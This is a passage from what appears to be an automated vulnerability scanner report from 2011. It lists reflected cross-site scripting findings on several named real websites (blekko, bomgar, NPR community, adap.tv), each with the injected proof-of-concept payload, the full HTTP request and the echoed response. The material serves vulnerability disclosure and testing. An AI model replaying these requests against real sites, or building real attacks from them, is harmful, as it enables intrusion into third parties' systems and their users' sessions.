Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 26231
X-Blekko-QF: hq
X-Blekko-PT: bc0ea90210c45929edf8143450faf9b4

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /urlseod4048--><script>alert(1)</script>a9a3a3e2e54 slash_q: /urlseod4048-->
...[SNIP]...

1.93. http://blekko.com/ws/http://elbo.ws/+/visualize [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/http://elbo.ws/+/visualize

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 8d039--><script>alert(1)</script>23bc12b73c2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ws/http://elbo.ws/+/visualize8d039--><script>alert(1)</script>23bc12b73c2?&co=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: text/html, */*; q=0.01
Cache-Control: no-cache
Host: blekko.com
Cookie: sessionid=55393633
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:39:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Thu, 04 Mar 2021 01:39:42 GMT
Set-Cookie: v=1; path=/; expires=Thu, 04 Mar 2021 01:39:42 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 26273
X-Blekko-QF: hq
X-Blekko-PT: 73fb5a5406d974af4c58137f212bb6d8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- slashgood: /visualize8d039--><script>alert(1)</script>23bc12b73c2 slash_q: /visualize8d039-->
...[SNIP]...

1.94. http://community.bomgar.com/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.bomgar.com
Path:   /index.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 46c59<script>alert(1)</script>14300c00191 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /46c59<script>alert(1)</script>14300c00191 HTTP/1.1
Host: community.bomgar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Mar 2011 12:03:23 GMT
Server: Apache
Set-Cookie: swl_bomgar_sess=8a53d406464e7e265306bdfd14ce9b18; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: swl_debug=deleted; expires=Mon, 08-Mar-2010 12:03:23 GMT; httponly
Vary: Accept-Encoding
Content-Length: 239
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /46c59<script>alert(1)</script>14300c00191 was not found on this server.</p>
...[SNIP]...

1.95. http://community.npr.org/ver1.0/Direct/Jsonp [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.npr.org
Path:   /ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 853e1<script>alert(1)</script>8247c141a2c was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22DiscoverContentAction%22%3A%7B%22Activity%22%3A%7B%22Activity%22%3A%7B%22Name%22%3A%22Commented%22%7D%7D%2C%22Age%22%3A2%2C%22ContentType%22%3A%7B%22ContentType%22%3A%7B%22Name%22%3A%22Article%22%7D%7D%2C%22LimitToContributors%22%3A%5B%7B%22UserTier%22%3A%7B%22Name%22%3A%22Standard%22%7D%7D%5D%2C%22MaximumNumberOfDiscoveries%22%3A4%2C%22SearchCategories%22%3A%5B%7B%22Category%22%3A%7B%7D%7D%5D%2C%22SearchSections%22%3A%5B%7B%22Section%22%3A%7B%22Name%22%3A%22All%22%7D%7D%5D%7D%7D%2C%7B%22DiscoverContentAction%22%3A%7B%22Activity%22%3A%7B%22Activity%22%3A%7B%22Name%22%3A%22Recommended%22%7D%7D%2C%22Age%22%3A2%2C%22ContentType%22%3A%7B%22ContentType%22%3A%7B%22Name%22%3A%22Article%22%7D%7D%2C%22LimitToContributors%22%3A%5B%7B%22UserTier%22%3A%7B%22Name%22%3A%22Standard%22%7D%7D%5D%2C%22MaximumNumberOfDiscoveries%22%3A4%2C%22SearchCategories%22%3A%5B%7B%22Category%22%3A%7B%7D%7D%5D%2C%22SearchSections%22%3A%5B%7B%22Section%22%3A%7B%22Name%22%3A%22All%22%7D%7D%5D%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback0853e1<script>alert(1)</script>8247c141a2c HTTP/1.1
Host: community.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: plckarptnpr=R4181523433; GUID=00072D2E61F00D7544B182A361626364; LE1=j7MTD1+4mf4+31+5; LE2=j7MTD1+4Gc4+31+5; __gads=ID=fcdec54320c1d3ec:T=1299538425:S=ALNI_MZC3MrMfYZgHu4zHMiEHfmLb2rLJQ

Response

HTTP/1.1 200 OK
Set-Cookie: plckarptnpr=R4181523433; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Pluckbox: l3vm107
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm107l3pluckcom
Set-Cookie: SiteLifeHost=l3vm107l3pluckcom; domain=npr.org; path=/
Set-Cookie: anonId=151fcba0-525e-4a17-b991-b4e77e5a474c; domain=npr.org; expires=Tue, 06-Mar-2012 22:54:45 GMT; path=/
Date: Mon, 07 Mar 2011 22:54:44 GMT
Content-Length: 8115

RequestBatch.callbacks.daapiCallback0853e1<script>alert(1)</script>8247c141a2c({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"03/07/2011 05:54:45:444 PM"}],"Responses":[{"DiscoverContentAction":{"SearchSections":[{"Name":"all"}],"SearchCategories":[{"Name":"all"}],
...[SNIP]...

1.96. http://control.adap.tv/control [as parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the as request parameter is copied into the HTML document as plain text between tags. The payload 98ac4<a>9babd9333ae was submitted in the as parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=398ac4<a>9babd9333ae&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A06%3A32";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:53:12 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29120

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
riam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=398ac4<a>9babd9333ae&eov=fw5il5]]>
...[SNIP]...

1.97. http://control.adap.tv/control [categories parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the categories request parameter is copied into the HTML document as plain text between tags. The payload 2afc5<a>336ae514bdb was submitted in the categories parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory22afc5<a>336ae514bdb&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A04%3A35";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:51:15 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 30501

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
0&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory22afc5<a>336ae514bdb&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5]]>
...[SNIP]...

1.98. http://control.adap.tv/control [companionId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the companionId request parameter is copied into the HTML document as plain text between tags. The payload bfcf8<a>990b97b465b was submitted in the companionId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_adbfcf8<a>990b97b465b&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A05%3A56";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:52:36 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29673

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
w.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_adbfcf8<a>990b97b465b&as=3&eov=fw5il5]]>
...[SNIP]...

1.99. http://control.adap.tv/control [description parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the description request parameter is copied into the HTML document as plain text between tags. The payload 4bc0b<a>d55f2fa87d4 was submitted in the description parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'4bc0b<a>d55f2fa87d4&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A00%3A58";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:47:38 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29673

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'4bc0b<a>d55f2fa87d4&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fx
...[SNIP]...

1.100. http://control.adap.tv/control [duration parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the duration request parameter is copied into the HTML document as plain text between tags. The payload 9d05d<a>d0418fc140c was submitted in the duration parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=1110009d05d<a>d0418fc140c&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A01%3A20";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:48:00 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 30501

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=1110009d05d<a>d0418fc140c&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2
...[SNIP]...

1.101. http://control.adap.tv/control [eov parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the eov request parameter is copied into the HTML document as plain text between tags. The payload d55ca<a>e622e206ef9 was submitted in the eov parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5d55ca<a>e622e206ef9 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A07%3A14";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:53:54 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 29673

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
r.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5d55ca<a>e622e206ef9]]>
...[SNIP]...

1.102. http://control.adap.tv/control [height parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 6eead<a>c1e6e1a085e was submitted in the height parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=2406eead<a>c1e6e1a085e&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A01%3A27";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:48:07 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 30501

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=2406eead<a>c1e6e1a085e&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&
...[SNIP]...

1.103. http://control.adap.tv/control [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://control.adap.tv
Path:   /control

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ca11a<a>6a67868646c was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhomca11a<a>6a67868646c&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-06+17%3A02%3A48";Path=/;Domain=.adap.tv;Expires=Thu, 13-Nov-42 02:49:28 GMT
Content-Type: text/xml
Server: Jetty(6.1.22)
Content-Length: 30501

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=h
...[SNIP]...
ter.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhomca11a<a>6a67868646c&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5]]>
